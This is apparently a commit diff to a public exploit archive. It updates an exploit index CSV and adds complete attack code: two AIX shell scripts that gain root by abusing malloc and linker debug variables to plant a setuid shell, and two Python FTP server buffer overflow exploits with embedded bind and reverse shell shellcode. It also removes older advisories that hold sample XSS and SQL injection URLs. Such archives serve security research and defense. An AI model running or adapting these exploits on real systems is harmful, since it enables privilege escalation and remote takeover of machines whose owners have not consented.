34250,platforms/php/webapps/34250.txt,"Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
|
||||
34250,platforms/php/webapps/34250.txt,"Joomla! Component 'com_canteen' 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
|
||||
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
|
||||
34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0
|
||||
34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0
|
||||
|
@ -31131,7 +31126,7 @@ id,file,description,date,author,platform,type,port
|
|||
34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
|
||||
34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
|
||||
34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
|
||||
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection",2010-08-12,Affix,php,webapps,0
|
||||
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)",2010-08-12,Affix,php,webapps,0
|
||||
34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0
|
||||
34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0
|
||||
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
|
||||
|
@ -33979,6 +33974,7 @@ id,file,description,date,author,platform,type,port
|
|||
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
|
||||
40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
|
||||
|
@ -36568,7 +36564,7 @@ id,file,description,date,author,platform,type,port
|
|||
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
|
||||
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40439,platforms/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
|
||||
40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
|
||||
40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
|
||||
|
@ -36588,7 +36584,7 @@ id,file,description,date,author,platform,type,port
|
|||
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection (1)",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
|
||||
|
@ -36711,7 +36707,7 @@ id,file,description,date,author,platform,type,port
|
|||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
|
||||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
|
@ -36797,3 +36793,9 @@ id,file,description,date,author,platform,type,port
|
|||
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
|
||||
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
|
||||
40711,platforms/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0
|
||||
40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
62
platforms/aix/local/40709.sh
Executable file
62
platforms/aix/local/40709.sh
Executable file
|
@ -0,0 +1,62 @@
|
|||
#!/usr/bin/sh
|
||||
#
|
||||
# AIX lsmcode local root exploit.
|
||||
#
|
||||
# Affected: AIX 6.1/7.1/7.2.0.2
|
||||
#
|
||||
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
|
||||
#
|
||||
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
|
||||
|
||||
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
|
||||
|
||||
if [ ! -x "/usr/sbin/lsmcode" ]; then
|
||||
echo "[-] lsmcode isn't executable. Exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
|
||||
echo "[*] Current id: `/usr/bin/id`"
|
||||
echo "[*] Exporting variables"
|
||||
|
||||
MALLOCOPTIONS=buckets
|
||||
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
|
||||
export MALLOCOPTIONS MALLOCBUCKETS
|
||||
|
||||
echo "[*] Setting umask to 000"
|
||||
umask 000
|
||||
|
||||
echo "[*] Executing vulnerable binary [lsmcode]"
|
||||
/usr/sbin/lsmcode -c >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "/etc/suid_profile" ]; then
|
||||
echo "[-] /etc/suid_profile does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Cleaning up /etc/suid_profile"
|
||||
echo > /etc/suid_profile
|
||||
|
||||
echo "[*] Preparing escalation"
|
||||
cat << EOF >/etc/suid_profile
|
||||
cp /bin/ksh $ROOTSHELL
|
||||
/usr/bin/syscall setreuid 0 0
|
||||
chown root:system $ROOTSHELL
|
||||
chmod 6755 $ROOTSHELL
|
||||
rm /etc/suid_profile
|
||||
EOF
|
||||
|
||||
echo "[*] Cleaning up environment variables"
|
||||
unset MALLOCBUCKETS MALLOCOPTIONS
|
||||
|
||||
echo "[*] Escalating"
|
||||
/usr/bin/ibstat -a >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "$ROOTSHELL" ]; then
|
||||
echo "[-] Rootshell does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Executing rootshell"
|
||||
$ROOTSHELL
|
||||
echo "[*] Make sure to remove $ROOTSHELL"
|
131
platforms/aix/local/40710.sh
Executable file
131
platforms/aix/local/40710.sh
Executable file
|
@ -0,0 +1,131 @@
|
|||
#!/usr/bin/sh
|
||||
#
|
||||
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
|
||||
#
|
||||
# This exploit takes advantage of known issues with debugging functions
|
||||
# within the AIX linker library. We are taking advantage of known
|
||||
# functionality, and focusing on badly coded SUID binaries which do not
|
||||
# adhere to proper security checks prior to seteuid/open/writes.
|
||||
#
|
||||
# The CVEs we will be taking advantage of:
|
||||
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
|
||||
# local users to create or overwrite arbitrary files via a symlink attack on
|
||||
# the log file associated with the MALLOCDEBUG environment variable.
|
||||
#
|
||||
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
|
||||
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
|
||||
# environment variables, which allows local users to gain privileges by
|
||||
# leveraging a setuid-root program to create an arbitrary root-owned file
|
||||
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
|
||||
# library) in AIX 5.3 and libc.a in AIX 6.1.
|
||||
#
|
||||
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
|
||||
# File Writes In IBM AIX.
|
||||
#
|
||||
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
|
||||
# which were reported in the original reports as being used for escalation of
|
||||
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
|
||||
# patches and become an attack vector.
|
||||
#
|
||||
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
|
||||
#
|
||||
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
|
||||
|
||||
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
|
||||
APP=$0
|
||||
|
||||
function usage
|
||||
{
|
||||
echo "Usage: $APP [1] | [2] | [3]"
|
||||
echo
|
||||
echo "1 - MALLOCDEBUG file write -> escalation"
|
||||
echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
|
||||
echo "3 - MALLOCBUCKETS file write -> escalation"
|
||||
echo
|
||||
echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
|
||||
exit
|
||||
}
|
||||
|
||||
function CVE20091786
|
||||
{
|
||||
echo "[*] Exporting MALLOCDEBUG environment variable"
|
||||
MALLOCTYPE=debug
|
||||
MALLOCDEBUG=report_allocations,output:/etc/suid_profile
|
||||
export MALLOCTYPE MALLOCDEBUG
|
||||
}
|
||||
|
||||
function CVE20092669
|
||||
{
|
||||
echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
|
||||
_LIB_INIT_DBG=1
|
||||
_LIB_INIT_DBG_FILE=/etc/suid_profile
|
||||
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
|
||||
}
|
||||
|
||||
function CVE20143074
|
||||
{
|
||||
echo "[*] Exporting MALLOCBUCKETS environment variable"
|
||||
MALLOCOPTIONS=buckets
|
||||
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
|
||||
export MALLOCOPTIONS MALLOCBUCKETS
|
||||
}
|
||||
|
||||
if [ -z "$1" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
|
||||
while [ "$1" != "" ]; do
|
||||
case $1 in
|
||||
1 ) CVE20091786;;
|
||||
2 ) CVE20092669;;
|
||||
3 ) CVE20143074;;
|
||||
* ) usage
|
||||
break;;
|
||||
esac
|
||||
shift
|
||||
done
|
||||
|
||||
if [ ! -x "/usr/sbin/lquerylv" ]; then
|
||||
echo "[-] lquerylv isn't executable. Tough luck."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Setting umask to 000"
|
||||
umask 000
|
||||
|
||||
echo "[*] Execute our vulnerable binary"
|
||||
/usr/sbin/lquerylv >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "/etc/suid_profile" ]; then
|
||||
echo "[-] /etc/suid_profile does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Cleaning up /etc/suid_profile"
|
||||
echo > /etc/suid_profile
|
||||
|
||||
echo "[*] Current id: `/usr/bin/id`"
|
||||
|
||||
echo "[*] Adding payload"
|
||||
cat << EOF >/etc/suid_profile
|
||||
cp /bin/ksh $ROOTSHELL
|
||||
/usr/bin/syscall setreuid 0 0
|
||||
chown root:system $ROOTSHELL
|
||||
chmod 6755 $ROOTSHELL
|
||||
rm /etc/suid_profile
|
||||
EOF
|
||||
|
||||
echo "[*] Unsetting env"
|
||||
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
|
||||
|
||||
echo "[*] Executing ibstat for fun and profit"
|
||||
/usr/bin/ibstat -a >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "$ROOTSHELL" ]; then
|
||||
echo "[-] Rootshell does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Executing rootshell"
|
||||
$ROOTSHELL
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/11337/info
|
||||
|
||||
It is reported that CubeCart is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI data prior to including it in an SQL query.
|
||||
|
||||
An attacker may exploit this issue to manipulate SQL queries, potentially revealing or corrupting sensitive database data. This issue may also facilitate attacks against the underlying database software.
|
||||
|
||||
This vulnerability is reported to exist in version 2.0.1 of CubeCart. Other versions may also be affected.
|
||||
|
||||
http://www.example.com/store/index.php?cat_id=1 or 1=1
|
|
@ -1,29 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40444/info
|
||||
|
||||
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The issue affects Joomla! versions prior to 1.5.18.
|
||||
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40690/info
|
||||
|
||||
The JForJoomla JReservation component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40828/info
|
||||
|
||||
The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/index.php?r=[XSS]
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40860/info
|
||||
|
||||
The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]
|
58
platforms/windows/remote/40711.py
Executable file
58
platforms/windows/remote/40711.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
#!/usr/bin/env python
|
||||
#-*- coding: utf-8 -*-
|
||||
|
||||
# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
|
||||
# Date: 04/11/2016
|
||||
# Exploit Author: Luis Noriega
|
||||
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
|
||||
# CVE : n/a
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
# shellcode with metasploit:
|
||||
# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
|
||||
# nc 192.168.1.150 4444
|
||||
|
||||
ret = "\x2F\x1D\xF1\x77" # GDI32.dll
|
||||
shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
|
||||
"\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a"
|
||||
"\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11"
|
||||
"\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac"
|
||||
"\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4"
|
||||
"\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07"
|
||||
"\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c"
|
||||
"\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53"
|
||||
"\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8"
|
||||
"\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48"
|
||||
"\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39"
|
||||
"\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e"
|
||||
"\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35"
|
||||
"\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77"
|
||||
"\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde"
|
||||
"\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51"
|
||||
"\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41"
|
||||
"\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52"
|
||||
"\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83"
|
||||
"\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2"
|
||||
"\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34"
|
||||
"\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0"
|
||||
"\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4"
|
||||
"\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe")
|
||||
|
||||
|
||||
buffer = '\x90' * 30 + shellcode
|
||||
buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer))
|
||||
print "Sending Buffer"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
|
||||
connect = s.connect(('192.168.1.150', 21))
|
||||
s.recv(1024)
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('SITE ZONE' + buffer1 + '\r\n')
|
||||
s.close()
|
58
platforms/windows/remote/40712.py
Executable file
58
platforms/windows/remote/40712.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
import socket
|
||||
|
||||
|
||||
#Exploit Title: PCMan FTP Server 2.0 Buffer Overflow NLST command
|
||||
#Date: 03/11/16
|
||||
#Exploit Author: Karri93
|
||||
#Version: 2.0
|
||||
#Tested on: Windows XP Profesional SP3 Spanish x86
|
||||
#CVE: N/A
|
||||
|
||||
|
||||
#Shellcode Metasploit:
|
||||
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
|
||||
#nc -lvp 443
|
||||
|
||||
|
||||
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
|
||||
|
||||
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
|
||||
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
|
||||
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
|
||||
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
|
||||
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
|
||||
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
|
||||
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
|
||||
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
|
||||
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
|
||||
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
|
||||
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
|
||||
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
|
||||
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
|
||||
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
|
||||
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
|
||||
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
|
||||
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
|
||||
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
|
||||
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
|
||||
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
|
||||
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
|
||||
